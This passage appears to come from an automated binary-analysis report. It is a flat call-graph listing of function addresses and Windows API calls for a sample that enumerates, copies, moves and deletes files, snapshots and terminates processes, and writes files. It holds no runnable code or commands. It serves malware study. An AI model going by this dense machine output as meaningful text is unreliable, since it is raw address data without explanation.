100823->100815 100825 ff1207 59 API calls 100823->100825 100826 104bd25 100825->100826 100827 ff1207 59 API calls 100826->100827 100828 104bd2e 100827->100828 100829 fe4d37 84 API calls 100828->100829 100830 104bd3b 100829->100830 100831 1000119 59 API calls 100830->100831 100832 104bd4e 100831->100832 100833 ff17e0 59 API calls 100832->100833 100834 104bd5f 100833->100834 100835 104412a 3 API calls 100834->100835 100842 104bd88 Mailbox 100834->100842 100837 104bd6e 100835->100837 100836 fe502b 59 API calls 100836->100815 100838 ff1a36 59 API calls 100837->100838 100837->100842 100839 104bd7f 100838->100839 101275 1043f1d 100839->101275 100841->100652 100842->100836 100844 ff42d9 100843->100844 100845 ff42e8 100843->100845 100844->100652 100845->100844 100846 ff42ed CloseHandle 100845->100846 100846->100844 101411 104f87d 100847->101411 100849 104e4b0 100849->100652 100851 fe502b 59 API calls 100850->100851 100852 fee381 100851->100852 100853 fee3bc Sleep 100852->100853 100854 fee385 timeGetTime 100852->100854 100855 fee3b4 100853->100855 100856 fe502b 59 API calls 100854->100856 100855->100652 100857 fee39b 100856->100857 100858 febc70 299 API calls 100857->100858 100858->100855 101547 105d1c6 100859->101547 100861 105e61c 100861->100652 100862->100652 100864 ff1a45 __NMSG_WRITE _memmove 100863->100864 100865 1000fe6 Mailbox 59 API calls 100864->100865 100866 ff1a83 100865->100866 100866->100636 100867->100585 100868->100590 100869->100652 100870->100586 100871->100586 100872->100586 100874 ff1caf 100873->100874 100875 ff1ca7 100873->100875 100874->100652 100876 ff1bcc 59 API calls 100875->100876 100876->100874 100877->100652 100878->100652 100879->100652 100881 fe4d51 100880->100881 100890 fe4d4b 100880->100890 100882 101db28 __i64tow 100881->100882 100883 fe4d99 100881->100883 100885 fe4d57 __itow 100881->100885 100888 101da2f 100881->100888 101657 10038c8 83 API calls 3 library calls 100883->101657 100887 1000fe6 Mailbox 59 API calls 100885->100887 100889 fe4d71 100887->100889 100891 1000fe6 Mailbox 59 API calls 100888->100891 100896 101daa7 Mailbox _wcscpy 100888->100896 100889->100890 100892 ff1a36 59 API calls 100889->100892 100890->100652 100893 101da74 100891->100893 100892->100890 100894 1000fe6 Mailbox 59 API calls 100893->100894 100895 101da9a 100894->100895 100895->100896 100897 ff1a36 59 API calls 100895->100897 101658 10038c8 83 API calls 3 library calls 100896->101658 100897->100896 100898->100652 100899->100652 100901 1000fe6 Mailbox 59 API calls 100900->100901 100902 ff1228 100901->100902 100903 1000fe6 Mailbox 59 API calls 100902->100903 100904 ff1236 100903->100904 100904->100632 100905->100632 100906->100632 100907->100632 100909 105c380 100908->100909 100910 105c39a 100908->100910 101686 104a48d 89 API calls 4 library calls 100909->101686 101659 105a8fd 100910->101659 100914 fe53b0 300 API calls 100915 105c406 100914->100915 100916 105c498 100915->100916 100919 105c447 100915->100919 100941 105c392 Mailbox 100915->100941 100917 105c4ee 100916->100917 100918 105c49e 100916->100918 100920 fe4d37 84 API calls 100917->100920 100917->100941 101687 1047ed5 59 API calls 100918->101687 100924 104789a 59 API calls 100919->100924 100922 105c500 100920->100922 100925 ff1aa4 59 API calls 100922->100925 100923 105c4c1 101688 ff35b9 59 API calls Mailbox 100923->101688 100927 105c477 100924->100927 100928 105c524 CharUpperBuffW 100925->100928 100930 1036ebc 300 API calls 100927->100930 100931 105c53e 100928->100931 100929 105c4c9 Mailbox 100934 feb020 300 API calls 100929->100934 100930->100941 100932 105c545 100931->100932 100933 105c591 100931->100933 101666 104789a 100932->101666 100935 fe4d37 84 API calls 100933->100935 100934->100941 100936 105c599 100935->100936 101689 fe5376 60 API calls 100936->101689 100941->100652 100942 105c5a3 100942->100941 100943 fe4d37 84 API calls 100942->100943 100944 105c5be 100943->100944 101690 ff35b9 59 API calls Mailbox 100944->101690 100946 105c5ce 100947 feb020 300 API calls 100946->100947 100947->100941 100948->100632 100949->100632 100950->100632 101812 1044ce2 100951->101812 100953 1044244 CloseHandle 100953->100632 100954 1044195 Process32NextW 100954->100953 100958 104418e Mailbox 100954->100958 100955 ff1207 59 API calls 100955->100958 100956 ff1a36 59 API calls 100956->100958 100957 1000119 59 API calls 100957->100958 100958->100953 100958->100954 100958->100955 100958->100956 100958->100957 100959 ff17e0 59 API calls 100958->100959 100960 ff151f 61 API calls 100958->100960 100959->100958 100960->100958 100962 fe35e2 100961->100962 100963 fe35b0 100961->100963 100962->100744 100963->100962 100964 fe35d5 IsDialogMessageW 100963->100964 100965 101d273 GetClassLongW 100963->100965 100964->100962 100964->100963 100965->100963 100965->100964 100967 fe53b0 301 API calls 100966->100967 100968 fe951f 100967->100968 100969 1022001 100968->100969 100977 fe9527 _memmove 100968->100977 101002 fe5190 59 API calls Mailbox 100969->101002 100971 10222c0 101008 104a48d 89 API calls 4 library calls 100971->101008 100973 10222de 100973->100973 100974 fe9583 100974->100752 100975 fe9944 100979 1000fe6 Mailbox 59 API calls 100975->100979 100976 fe986a 100980 fe987f 100976->100980 100981 10222b1 100976->100981 100977->100971 100977->100974 100977->100975 100978 1000fe6 59 API calls Mailbox 100977->100978 100985 fe96cf 100977->100985 100995 fe9741 100977->100995 100978->100977 100984 fe96e3 _memmove 100979->100984 100982 1000fe6 Mailbox 59 API calls 100980->100982 101007 105a983 59 API calls 100981->101007 100993 fe977d 100982->100993 100986 1000fe6 Mailbox 59 API calls 100984->100986 100990 fe970e 100984->100990 100984->100995 100985->100975 100987 fe96dc 100985->100987 100986->100990 100989 1000fe6 Mailbox 59 API calls 100987->100989 100988 10222a0 101006 104a48d 89 API calls 4 library calls 100988->101006 100989->100984 100990->100995 101001 fecca0 301 API calls 100990->101001 100993->100752 100995->100976 100995->100988 100995->100993 100996 1022278 100995->100996 100998 1022253 100995->100998 101003 fe8180 301 API calls 100995->101003 101005 104a48d 89 API calls 4 library calls 100996->101005 101004 104a48d 89 API calls 4 library calls 100998->101004 101000->100754 101001->100995 101002->100975 101003->100995 101004->100993 101005->100993 101006->100993 101007->100971 101008->100973 101010 ff1bef _memmove 101009->101010 101011 ff1bdc 101009->101011 101010->100785 101011->101010 101012 1000fe6 Mailbox 59 API calls 101011->101012 101012->101010 101013->100785 101024 1002e74 101014->101024 101016 1002f7b 101016->100769 101017->100785 101018->100785 101019->100785 101020->100785 101021->100777 101022->100785 101023->100785 101025 1002e80 __mtinitlocknum 101024->101025 101032 1003447 101025->101032 101031 1002ea7 __mtinitlocknum 101031->101016 101049 1009e3b 101032->101049 101034 1002e89 101035 1002eb8 DecodePointer DecodePointer 101034->101035 101036 1002ee5 101035->101036 101037 1002e95 101035->101037 101036->101037 101095 10089d4 59 API calls 2 library calls 101036->101095 101046 1002eb2 101037->101046 101039 1002f48 EncodePointer EncodePointer 101039->101037 101040 1002ef7 101040->101039 101043 1002f1c 101040->101043 101096 1008a94 61 API calls 2 library calls 101040->101096 101043->101037 101045 1002f36 EncodePointer 101043->101045 101097 1008a94 61 API calls 2 library calls 101043->101097 101044 1002f30 101044->101037 101044->101045 101045->101039 101098 1003450 101046->101098 101050 1009e4c 101049->101050 101051 1009e5f EnterCriticalSection 101049->101051 101056 1009ec3 101050->101056 101051->101034 101053 1009e52 101053->101051 101080 10032e5 58 API calls 3 library calls 101053->101080 101057 1009ecf __mtinitlocknum 101056->101057 101058 1009ef0 101057->101058 101059 1009ed8 101057->101059 101068 1009f11 __mtinitlocknum 101058->101068 101084 1008a4d 58 API calls 2 library calls 101058->101084 101081 100a39b 58 API calls __NMSG_WRITE 101059->101081 101061 1009edd 101082 100a3f8 58 API calls 6 library calls 101061->101082 101064 1009f05 101066 1009f1b 101064->101066 101067 1009f0c 101064->101067 101065 1009ee4 101083 10032cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101065->101083 101071 1009e3b __lock 58 API calls 101066->101071 101085 1008d58 58 API calls __getptd_noexit 101067->101085 101068->101053 101073 1009f22 101071->101073 101074 1009f47 101073->101074 101075 1009f2f 101073->101075 101087 1002f85 101074->101087 101086 100a05b InitializeCriticalSectionAndSpinCount 101075->101086 101078 1009f3b 101093 1009f63 LeaveCriticalSection _doexit 101078->101093 101081->101061 101082->101065 101084->101064 101085->101068 101086->101078 101088 1002fb7 _free 101087->101088 101089 1002f8e RtlFreeHeap 101087->101089 101088->101078 101089->101088 101090 1002fa3 101089->101090 101094 1008d58 58 API calls __getptd_noexit 101090->101094 101092 1002fa9 GetLastError 101092->101088 101093->101068 101094->101092 101095->101040 101096->101043 101097->101044 101101 1009fa5 LeaveCriticalSection 101098->101101 101100 1002eb7 101100->101031 101101->101100 101102->100800 101103->100789 101104->100800 101105->100798 101106->100800 101108 ff1207 59 API calls 101107->101108 101109 1044024 101108->101109 101110 ff1207 59 API calls 101109->101110 101111 104402d 101110->101111 101112 ff1207 59 API calls 101111->101112 101113 1044036 101112->101113 101131 1000284 101113->101131 101118 104405c 101143 1000119 101118->101143 101119 ff1900 59 API calls 101119->101118 101121 1044070 FindFirstFileW 101122 10440fc FindClose 101121->101122 101125 104408f 101121->101125 101126 1044107 Mailbox 101122->101126 101123 10440d7 FindNextFileW 101123->101125 101124 ff1c9c 59 API calls 101124->101125 101125->101122 101125->101123 101125->101124 101194 ff17e0 101125->101194 101203 ff1900 101125->101203 101126->100807 101130 10440f3 FindClose 101130->101126 101210 1011b70 101131->101210 101134 10002b0 101216 ff1821 101134->101216 101135 10002cd 101225 ff19e1 101135->101225 101138 10002bc 101212 ff133d 101138->101212 101141 1044fec GetFileAttributesW 101142 104404a 101141->101142 101142->101118 101142->101119 101144 ff1207 59 API calls 101143->101144 101145 100012f 101144->101145 101146 ff1207 59 API calls 101145->101146 101147 1000137 101146->101147 101148 ff1207 59 API calls 101147->101148 101149 100013f 101148->101149 101150 ff1207 59 API calls 101149->101150 101151 1000147 101150->101151 101152 100017b 101151->101152 101153 103627d 101151->101153 101154 ff1462 59 API calls 101152->101154 101155 ff1c9c 59 API calls 101153->101155 101156 1000189 101154->101156 101157 1036286 101155->101157 101158 ff1981 59 API calls 101156->101158 101159 ff19e1 59 API calls 101157->101159 101160 1000193 101158->101160 101162 10001be 101159->101162 101161 ff1462 59 API calls 101160->101161 101160->101162 101165 10001b4 101161->101165 101163 10001fe 101162->101163 101166 10001dd 101162->101166 101176 10362a6 101162->101176 101237 ff1462 101163->101237 101168 ff1981 59 API calls 101165->101168 101250 ff1609 101166->101250 101167 100020f 101172 1000221 101167->101172 101174 ff1c9c 59 API calls 101167->101174 101168->101162 101169 1036376 101173 ff1821 59 API calls 101169->101173 101175 1000231 101172->101175 101178 ff1c9c 59 API calls 101172->101178 101189 1036333 101173->101189 101174->101172 101180 1000238 101175->101180 101181 ff1c9c 59 API calls 101175->101181 101176->101169 101179 103635f 101176->101179 101188 10362dd 101176->101188 101177 ff1462 59 API calls 101177->101163 101178->101175 101179->101169 101185 103634a 101179->101185 101182 ff1c9c 59 API calls 101180->101182 101191 100023f Mailbox 101180->101191 101181->101180 101182->101191 101183 ff1609 59 API calls 101183->101189 101184 103633b 101186 ff1821 59 API calls 101184->101186 101187 ff1821 59 API calls 101185->101187 101186->101189 101187->101189 101188->101184 101192 1036326 101188->101192 101189->101163 101189->101183 101253 ff153b 59 API calls 2 library calls 101189->101253 101191->101121 101193 ff1821 59 API calls 101192->101193 101193->101189 101195 102f401 101194->101195 101196 ff17f2 101194->101196 101261 10387f9 59 API calls _memmove 101195->101261 101255 ff1680 101196->101255 101199 ff17fe 101199->101125 101200 102f40b 101201 ff1c9c 59 API calls 101200->101201 101202 102f413 Mailbox 101201->101202 101204 102f534 101203->101204 101205 ff1914 101203->101205 101207 ff1c7e 59 API calls 101204->101207 101262 ff18a5 101205->101262 101209 102f53f __NMSG_WRITE _memmove 101207->101209 101208 ff191f DeleteFileW 101208->101123 101208->101130 101211 1000291 GetFullPathNameW 101210->101211 101211->101134 101211->101135 101213 ff134b 101212->101213 101229 ff1981 101213->101229 101215 ff135b 101215->101141 101217 ff182d __NMSG_WRITE 101216->101217 101218 ff189a 101216->101218 101220 ff1868 101217->101220 101221 ff1843 101217->101221 101219 ff1981 59 API calls 101218->101219 101224 ff184b _memmove 101219->101224 101234 ff1c7e 101220->101234 101233 ff1b7c 59 API calls Mailbox 101221->101233 101224->101138 101226 ff19fb 101225->101226 101228 ff19ee 101225->101228 101227 1000fe6 Mailbox 59 API calls 101226->101227 101227->101228 101228->101138 101230 ff1998 _memmove 101229->101230 101231 ff198f 101229->101231 101230->101215 101231->101230 101232 ff1aa4 59 API calls 101231->101232 101232->101230 101233->101224 101235 1000fe6 Mailbox 59 API calls 101234->101235 101236 ff1c88 101235->101236 101236->101224 101238 ff14ce 101237->101238 101239 ff1471 101237->101239 101241 ff1981 59 API calls 101238->101241 101239->101238 101240 ff147c 101239->101240 101243 ff1497 101240->101243 101244 102f1de 101240->101244 101242 ff149f _memmove 101241->101242 101242->101167 101254 ff1b7c 59 API calls Mailbox 101243->101254 101246 ff1c7e 59 API calls 101244->101246 101247 102f1e8 101246->101247 101248 1000fe6 Mailbox 59 API calls 101247->101248 101249 102f208 101248->101249 101251 ff1aa4 59 API calls 101250->101251 101252 ff1614 101251->101252 101252->101163 101252->101177 101253->101189 101254->101242 101256 ff1692 101255->101256 101260 ff16ba _memmove 101255->101260 101257 1000fe6 Mailbox 59 API calls 101256->101257 101256->101260 101259 ff176f _memmove 101257->101259 101258 1000fe6 Mailbox 59 API calls 101258->101259 101259->101258 101260->101199 101261->101200 101263 ff18b4 __NMSG_WRITE 101262->101263 101264 ff1c7e 59 API calls 101263->101264 101265 ff18c5 _memmove 101263->101265 101266 102f4f1 _memmove 101264->101266 101265->101208 101268 1044131 101267->101268 101269 1044965 FindFirstFileW 101267->101269 101268->100652 101269->101268 101270 104497a FindClose 101269->101270 101270->101268 101272 fe503c 101271->101272 101273 fe5041 101271->101273 101272->101273 101333 10037ba 59 API calls 101272->101333 101273->100817 101276 ff133d 59 API calls 101275->101276 101277 1043f52 GetFileAttributesW 101276->101277 101278 1043f66 GetLastError 101277->101278 101281 1043f7f Mailbox 101277->101281 101279 1043f73 CreateDirectoryW 101278->101279 101280 1043f81 101278->101280 101279->101280 101279->101281 101280->101281 101282 ff1981 59 API calls 101280->101282 101281->100842 101283 1043fc3 101282->101283 101284 1043f1d 59 API calls 101283->101284 101285 1043fcc 101284->101285 101285->101281 101286 1043fd0 CreateDirectoryW 101285->101286 101286->101281 101288 ff1207 59 API calls 101287->101288 101289 1043cff 101288->101289 101290 ff1207 59 API calls 101289->101290 101291 1043d07 101290->101291 101292 ff1207 59 API calls 101291->101292 101293 1043d0f 101292->101293 101294 ff1207 59 API calls 101293->101294 101295 1043d17 101294->101295 101296 1000284 60 API calls 101295->101296 101297 1043d21 101296->101297 101298 1000284 60 API calls 101297->101298 101299 1043d2b 101298->101299 101334 1044f82 101299->101334 101301 1043d36 101302 1044fec GetFileAttributesW 101301->101302 101303 1043d41 101302->101303 101304 1043d53 101303->101304 101305 ff1900 59 API calls 101303->101305 101306 1044fec GetFileAttributesW 101304->101306 101305->101304 101307 1043d5b 101306->101307 101308 1043d68 101307->101308 101309 ff1900 59 API calls 101307->101309 101310 ff1207 59 API calls 101308->101310 101309->101308 101311 1043d70 101310->101311 101312 ff1207 59 API calls 101311->101312 101313 1043d78 101312->101313 101314 1000119 59 API calls 101313->101314 101315 1043d89 FindFirstFileW 101314->101315 101316 1043eb4 FindClose 101315->101316 101325 1043dac Mailbox 101315->101325 101321 1043ebe Mailbox 101316->101321 101317 1043e88 FindNextFileW 101317->101325 101318 ff1a36 59 API calls 101318->101325 101320 ff1c9c 59 API calls 101320->101325 101321->100841 101322 ff17e0 59 API calls 101322->101325 101323 ff1900 59 API calls 101323->101325 101324 104412a 3 API calls 101324->101325 101325->101316 101325->101317 101325->101318 101325->101320 101325->101322 101325->101323 101325->101324 101326 1043e2a 101325->101326 101327 1043eab FindClose 101325->101327 101329 1043ef7 CopyFileExW 101325->101329 101332 1043e6b DeleteFileW 101325->101332 101345 1044561 101325->101345 101330 1043e4e MoveFileW 101326->101330 101331 1043e3e DeleteFileW 101326->101331 101399 ff151f 101326->101399 101327->101321 101329->101325 101330->101325 101331->101325 101332->101325 101333->101273 101335 ff1207 59 API calls 101334->101335 101336 1044f97 101335->101336 101337 ff1207 59 API calls 101336->101337 101338 1044f9f 101337->101338 101339 1000119 59 API calls 101338->101339 101340 1044fae 101339->101340 101341 1000119 59 API calls 101340->101341 101342 1044fbe 101341->101342 101343 ff151f 61 API calls 101342->101343 101344 1044fce Mailbox 101343->101344 101344->101301 101346 104457d 101345->101346 101347 1044590 101346->101347 101348 1044582 101346->101348 101349 ff1207 59 API calls 101347->101349 101350 ff1c9c 59 API calls 101348->101350 101351 1044598 101349->101351 101398 104458b Mailbox 101350->101398 101352 ff1207 59 API calls 101351->101352 101353 10445a0 101352->101353 101354 ff1207 59 API calls 101353->101354 101355 10445ab 101354->101355 101356 ff1207 59 API calls 101355->101356 101357 10445b3 101356->101357 101358 ff1207 59 API calls 101357->101358 101359 10445bb 101358->101359 101360 ff1207 59 API calls 101359->101360 101361 10445c3 101360->101361 101362 ff1207 59 API calls 101361->101362 101363 10445cb 101362->101363 101364 ff1207 59 API calls 101363->101364 101365 10445d3 101364->101365 101366 1000119 59 API calls 101365->101366 101367 10445ea 101366->101367 101368 1000119 59 API calls 101367->101368 101369 1044603 101368->101369 101370 ff1609 59 API calls 101369->101370 101371 104460f 101370->101371 101372 1044622 101371->101372 101373 ff1981 59 API calls 101371->101373 101374 ff1609 59 API calls 101372->101374 101373->101372 101375 104462b 101374->101375 101376 104463b 101375->101376 101377 ff1981 59 API calls 101375->101377 101378 ff1c9c 59 API calls 101376->101378 101377->101376 101379 1044647 101378->101379 101380 ff17e0 59 API calls 101379->101380 101381 1044653 101380->101381 101402 1044713 59 API calls 101381->101402 101383 1044662 101403 1044713 59 API calls 101383->101403 101385 1044675 101386 ff1609 59 API calls 101385->101386 101387 104467f 101386->101387 101388 1044684 101387->101388 101389 1044696 101387->101389 101390 ff1900 59 API calls 101388->101390 101391 ff1609 59 API calls 101389->101391 101393 1044691 101390->101393 101392 104469f 101391->101392 101394 10446bd 101392->101394 101395 ff1900 59 API calls 101392->101395 101396 ff17e0 59 API calls 101393->101396 101397 ff17e0 59 API calls 101394->101397 101395->101393 101396->101394 101397->101398 101398->101325 101404 ff14db 101399->101404 101402->101383 101403->101385 101405 ff14e9 CompareStringW 101404->101405 101410 102f210 101404->101410 101408 ff150c 101405->101408 101407 102f25f 101408->101326 101409 1004eb8 60 API calls 101409->101410 101410->101407 101410->101409 101412 104f8f2 101411->101412 101413 104f898 101411->101413 101487 104fbb7 59 API calls 101412->101487 101414 1000fe6 Mailbox 59 API calls 101413->101414 101416 104f89f 101414->101416 101420 104f8ab 101416->101420 101474 ff3df7 60 API calls Mailbox 101416->101474 101417 104f8ff 101419 104f8d9 101417->101419 101422 104f9cb 101417->101422 101428 104f93f 101417->101428 101419->100849 101421 fe4d37 84 API calls 101420->101421 101424 104f8bd 101421->101424 101467 1048cd0 101422->101467 101475 ff3e47 101424->101475 101425 104f9d2 101471 104394d 101425->101471 101430 fe4d37 84 API calls 101428->101430 101429 104f8cd 101429->101419 101486 ff3f0b CloseHandle 101429->101486 101436 104f946 101430->101436 101433 104f9c1 101448 104399c 101433->101448 101434 104f97a 101488 ff162d 101434->101488 101436->101433 101436->101434 101438 ff42cf CloseHandle 101440 104fa20 101438->101440 101440->101419 101493 ff3f0b CloseHandle 101440->101493 101441 ff1c9c 59 API calls 101442 104f994 101441->101442 101443 ff1900 59 API calls 101442->101443 101445 104f9a2 101443->101445 101446 104399c 66 API calls 101445->101446 101447 104f9ae Mailbox 101446->101447 101447->101419 101447->101438 101449 1043a15 101448->101449 101450 10439af 101448->101450 101452 104394d 3 API calls 101449->101452 101450->101449 101451 10439b4 101450->101451 101453 1043a09 101451->101453 101454 10439be 101451->101454 101466 10439fd Mailbox 101452->101466 101511 1043a35 62 API calls Mailbox 101453->101511 101456 10439de 101454->101456 101457 10439c8 101454->101457 101458 ff40cd 59 API calls 101456->101458 101497 ff40cd 101457->101497 101460 10439e6 101458->101460 101510 10438e0 61 API calls Mailbox 101460->101510 101463 10439dc 101494 104397e 101463->101494 101466->101447 101468 1048cde 101467->101468 101469 1048cd9 101467->101469 101468->101425 101514 1047d6e 61 API calls 2 library calls 101469->101514 101515 104384c 101471->101515 101473 1043959 WriteFile 101473->101447 101474->101420 101476 ff42cf CloseHandle 101475->101476 101477 ff3e53 101476->101477 101524 ff42f9 101477->101524 101479 ff3e72 101485 ff3e95 101479->101485 101532 ff3c61 62 API calls Mailbox 101479->101532 101481 ff3e84 101533 ff389f 101481->101533 101484 104394d 3 API calls 101484->101485 101485->101417 101485->101429 101486->101419 101487->101417 101489 1000fe6 Mailbox 59 API calls 101488->101489 101490 ff1652 101489->101490 101491 1000fe6 Mailbox 59 API calls 101490->101491 101492 ff1660 101491->101492 101492->101441 101493->101419 101495 104394d 3 API calls 101494->101495 101496 1043990 101495->101496 101496->101466 101498 1000fe6 Mailbox 59 API calls 101497->101498 101499 ff40e0 101498->101499 101500 ff1c7e 59 API calls 101499->101500 101501 ff40ed 101500->101501 101502 ff402a WideCharToMultiByte 101501->101502 101503 ff404e 101502->101503 101504 ff4085 101502->101504 101506 1000fe6 Mailbox 59 API calls 101503->101506 101513 ff3f20 59 API calls Mailbox 101504->101513 101507 ff4055 WideCharToMultiByte 101506->101507 101512 ff3f79 59 API calls 2 library calls 101507->101512 101509 ff4077 101509->101463 101510->101463 101511->101466 101512->101509 101513->101509 101514->101468 101516 1043853 101515->101516 101517 104385e 101515->101517 101522 ff42ae SetFilePointerEx 101516->101522 101517->101473 101519 10438b8 SetFilePointerEx 101523 ff42ae SetFilePointerEx 101519->101523 101521 10438d7 101521->101473 101522->101519 101523->101521 101525 ff4312 CreateFileW 101524->101525 101526 10306fc 101524->101526 101527 ff4334 101525->101527 101526->101527 101528 1030702 CreateFileW 101526->101528 101527->101479 101528->101527 101529 1030728 101528->101529 101537 ff410a 101529->101537 101532->101481 101534 ff38a8 101533->101534 101535 ff38b5 101533->101535 101536 ff410a 2 API calls 101534->101536 101535->101484 101535->101485 101536->101535 101544 ff4124 101537->101544 101538 ff41ab SetFilePointerEx 101545 ff42ae SetFilePointerEx 101538->101545 101539 10306cc 101546 ff42ae SetFilePointerEx 101539->101546 101542 ff417f 101542->101527 101543 10306e6 101544->101538 101544->101539 101544->101542 101545->101542 101546->101543 101548 fe4d37 84 API calls 101547->101548 101549 105d203 101548->101549 101554 105d24a Mailbox 101549->101554 101585 105de8e 101549->101585 101551 105d617 101636 105dfb1 92 API calls Mailbox 101551->101636 101554->100861 101555 105d626 101556 105d4b0 101555->101556 101558 105d632 101555->101558 101598 105d057 101556->101598 101557 fe4d37 84 API calls 101563 105d29b Mailbox 101557->101563 101558->101554 101563->101554 101563->101557 101572 105d4a2 101563->101572 101618 104fc0d 59 API calls 2 library calls 101563->101618 101619 105d6c8 61 API calls 2 library calls 101563->101619 101564 105d4e9 101613 1000e38 101564->101613 101567 105d503 101620 104a48d 89 API calls 4 library calls 101567->101620 101568 105d51c 101621 fe47be 101568->101621 101571 105d50e GetCurrentProcess TerminateProcess 101571->101568 101572->101551 101572->101556 101577 105d68d 101577->101554 101581 105d6a1 FreeLibrary 101577->101581 101578 105d554 101633 105dd32 107 API calls _free 101578->101633 101581->101554 101583 105d565 101583->101577 101634 fe4230 59 API calls Mailbox 101583->101634 101635 fe523c 59 API calls 101583->101635 101637 105dd32 107 API calls _free 101583->101637 101586 ff1aa4 59 API calls 101585->101586 101587 105dea9 CharLowerBuffW 101586->101587 101638 103f903 101587->101638 101591 ff1207 59 API calls 101592 105dee2 101591->101592 101593 ff1462 59 API calls 101592->101593 101594 105def9 101593->101594 101595 ff1981 59 API calls 101594->101595 101596 105df05 Mailbox 101595->101596 101597 105df41 Mailbox 101596->101597 101645 105d6c8 61 API calls 2 library calls 101596->101645 101597->101563 101599 105d0c7 101598->101599 101600 105d072 101598->101600 101604 105e139 101599->101604 101601 1000fe6 Mailbox 59 API calls 101600->101601 101603 105d094 101601->101603 101602 1000fe6 Mailbox 59 API calls 101602->101603 101603->101599 101603->101602 101605 105e362 Mailbox 101604->101605 101612 105e15c _strcat _wcscpy __NMSG_WRITE 101604->101612 101605->101564 101606 fe5087 59 API calls 101606->101612 101607 fe502b 59 API calls 101607->101612 101608 fe50d5 59 API calls 101608->101612 101609 fe4d37 84 API calls 101609->101612 101610 100593c 58 API calls _W_store_winword 101610->101612 101612->101605 101612->101606 101612->101607 101612->101608 101612->101609 101612->101610 101646 1045e42 61 API calls 2 library calls 101612->101646 101616 1000e4d 101613->101616 101614 1000ee5 CreateToolhelp32Snapshot 101615 1000eb3 101614->101615 101615->101567 101615->101568 101616->101614 101616->101615 101617 1000ed3 CloseHandle 101616->101617 101617->101615 101618->101563 101619->101563 101620->101571 101622 fe47c6 101621->101622 101623 1000fe6 Mailbox 59 API calls 101622->101623 101624 fe47d4 101623->101624 101625 fe47e0 101624->101625 101647 fe46ec 59 API calls Mailbox 101624->101647 101627 fe4540 101625->101627 101648 fe4650 101627->101648 101629 fe454f 101630 1000fe6 Mailbox 59 API calls 101629->101630 101631 fe45eb 101629->101631 101630->101631 101631->101583 101632 fe4230 59 API calls Mailbox 101631->101632 101632->101578 101633->101583 101634->101583 101635->101583 101636->101555 101637->101583 101640 103f92e __NMSG_WRITE 101638->101640 101639 103f96d 101639->101591 101639->101596 101640->101639 101641 103fa14 101640->101641 101642 103f963 101640->101642 101641->101639 101644 ff14db 61 API calls 101641->101644 101642->101639 101643 ff14db 61 API calls 101642->101643 101643->101642 101644->101641 101645->101597 101646->101612 101647->101625 101649 fe4659 Mailbox 101648->101649 101650 101d6ec 101649->101650 101655 fe4663 101649->101655 101651 1000fe6 Mailbox 59 API calls 101650->101651 101653 101d6f8 101651->101653 101652 fe466a 101652->101629 101655->101652 101656 fe5190 59 API calls Mailbox 101655->101656 101656->101655 101657->100885 101658->100882 101660 105a970 101659->101660 101661 105a918 101659->101661 101660->100914 101662 1000fe6 Mailbox 59 API calls 101661->101662 101665 105a93a 101662->101665 101663 1000fe6 Mailbox 59 API calls 101663->101665 101665->101660 101665->101663 101691 103715b 59 API calls Mailbox 101665->101691 101667 10478ac 101666->101667 101669 10478e3 101666->101669 101668 1000fe6 Mailbox 59 API calls 101667->101668 101667->101669 101668->101669 101670 1036ebc 101669->101670 101671 1036f06 101670->101671 101676 1036f1c Mailbox 101670->101676 101674 ff1a36 59 API calls 101671->101674 101672 1036f47 101675 105c355 301 API calls 101672->101675 101673 1036f5a 101677 fea820 301 API calls 101673->101677 101674->101676 101682 1036f53 101675->101682 101676->101672 101676->101673 101680 1036f91 101677->101680 101679 1037002 101679->100941 101681 1036fdc 101680->101681 101680->101682 101684 1036fc1 101680->101684 101681->101682 101698 104a48d 89 API calls 4 library calls 101681->101698 101699 1036cf1 59 API calls Mailbox 101682->101699 101692 103706d 101684->101692 101686->100941 101687->100923 101688->100929 101689->100942 101690->100946 101691->101665 101693 1037085 101692->101693 101700 105495b 101693->101700 101709 105f1b2 101693->101709 101714 feec83 101693->101714 101694 10370d9 101694->101682 101698->101682 101699->101679 101701 1000fe6 Mailbox 59 API calls 101700->101701 101702 105496c 101701->101702 101789 ff433f 101702->101789 101705 fe4d37 84 API calls 101706 105498d GetEnvironmentVariableW 101705->101706 101792 1047a51 59 API calls Mailbox 101706->101792 101708 10549aa 101708->101694 101710 fe4d37 84 API calls 101709->101710 101711 105f1cf 101710->101711 101712 1044148 66 API calls 101711->101712 101713 105f1de 101712->101713 101713->101694 101715 fe4d37 84 API calls 101714->101715 101716 feeca2 101715->101716 101717 fe4d37 84 API calls 101716->101717 101718 feecb7 101717->101718 101719 fe4d37 84 API calls 101718->101719 101720 feecca 101719->101720 101721 fe4d37 84 API calls 101720->101721 101722 feece0 101721->101722 101723 ff162d 59 API calls 101722->101723 101724 feecf4 101723->101724 101725 feed19 101724->101725 101727 fe502b 59 API calls 101724->101727 101726 1025b67 101725->101726 101755 feed43 __wopenfile 101725->101755 101728 fe47be 59 API calls 101726->101728 101727->101725 101730 1025b7a 101728->101730 101729 feef3e 101731 fe47be 59 API calls 101729->101731 101732 fe4540 59 API calls 101730->101732 101734 1025d4a 101731->101734 101735 1025b8c 101732->101735 101733 fe4d37 84 API calls 101736 feedca 101733->101736 101737 1025d53 101734->101737 101738 1025d97 101734->101738 101739 fe43d0 59 API calls 101735->101739 101766 1025bb1 101735->101766 101740 fe4d37 84 API calls 101736->101740 101743 fe4540 59 API calls 101737->101743 101741 fe4540 59 API calls 101738->101741 101739->101766 101744 feeddf 101740->101744 101745 1025da1 101741->101745 101742 feef0c Mailbox 101742->101694 101748 1025d5e 101743->101748 101744->101729 101751 fe47be 59 API calls 101744->101751 101749 fe43d0 59 API calls 101745->101749 101747 1025c0f 101747->101729 101757 fe4540 59 API calls 101747->101757 101750 fe4d37 84 API calls 101748->101750 101752 1025dbd 101749->101752 101754 1025d70 101750->101754 101756 feedfe 101751->101756 101764 fe4d37 84 API calls 101752->101764 101753 fe477a 59 API calls 101753->101766 101808 ff1364 59 API calls 2 library calls 101754->101808 101755->101729 101755->101733 101755->101747 101779 feee30 __wopenfile 101755->101779 101756->101747 101759 feee09 101756->101759 101761 1025c76 101757->101761 101763 fe4540 59 API calls 101759->101763 101760 fe43d0 59 API calls 101760->101766 101767 fe43d0 59 API calls 101761->101767 101762 1025d84 101768 fe477a 59 API calls 101762->101768 101770 feee18 101763->101770 101771 1025dd8 101764->101771 101766->101742 101766->101753 101766->101760 101806 ff1364 59 API calls 2 library calls 101766->101806 101767->101779 101769 1025d92 101768->101769 101776 fe43d0 59 API calls 